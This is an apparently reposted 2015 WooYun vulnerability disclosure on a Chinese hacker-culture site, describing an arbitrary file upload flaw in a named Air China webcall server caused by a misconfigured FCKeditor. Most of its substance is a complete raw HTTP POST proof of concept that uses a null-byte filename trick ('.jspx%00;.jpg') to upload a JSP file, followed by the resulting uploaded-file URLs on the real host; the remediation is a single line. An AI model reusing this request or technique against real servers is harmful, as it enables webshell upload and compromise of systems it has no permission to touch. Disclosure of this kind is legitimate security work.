记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

国航某系统存在任意文件上传漏洞

2015-12-10 05:45

http://webcall.airchina.com.cn:9090/webstat/ucstarclient_webcall/client/ucallclient_1.jsp

QQ截图20151024154052.jpg





问题原因是由于fck配置不当造成的

QQ截图20151024154151.jpg





poc:

code 区域
POST http://webcall.airchina.com.cn:9090/FCKeditor/editor/filemanager/upload/simpleuploader?Type=File HTTP/1.1

Host: webcall.airchina.com.cn:9090

Connection: keep-alive

Content-Length: 189

Cache-Control: max-age=0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8

Origin: http://webcall.airchina.com.cn:9090

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.134 Safari/537.36

Content-Type: multipart/form-data; boundary=----WebKitFormBoundary1E5aBWJ6kwQ1ig1k

Referer: http://webcall.airchina.com.cn:9090/FCKeditor/editor/dialog/fck_image.html?ImageButton

Accept-Encoding: gzip, deflate

Accept-Language: zh-CN,zh;q=0.8

Cookie:



------WebKitFormBoundary1E5aBWJ6kwQ1ig1k

Content-Disposition: form-data; name="NewFile"; filename="guguji.jspx%00;.jpg"

Content-Type: image/jpeg



test

------WebKitFormBoundary1E5aBWJ6kwQ1ig1k--



上传的时候记得把%00

QQ截图20151024154314.jpg



上传后的地址:

http://webcall.airchina.com.cn:9090/UserFiles/File/guguji.jspx

QQ截图20151024154430.jpg

漏洞证明:

QQ截图20151024211404.jpg



QQ截图20151024211417.jpg



http://webcall.airchina.com.cn:9090/UserFiles/Image/is.jspf

QQ截图20151024211451.jpg

修复方案:

正确配置fck

知识来源: www.wooyun.org/bugs/wooyun-2015-0149224

阅读:86952 | 评论:0 | 标签:漏洞

想收藏或者和大家分享这篇好文章→复制链接地址

“国航某系统存在任意文件上传漏洞”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

九层之台,起于累土;黑客之术,始于阅读

推广

工具

标签云

本页关键词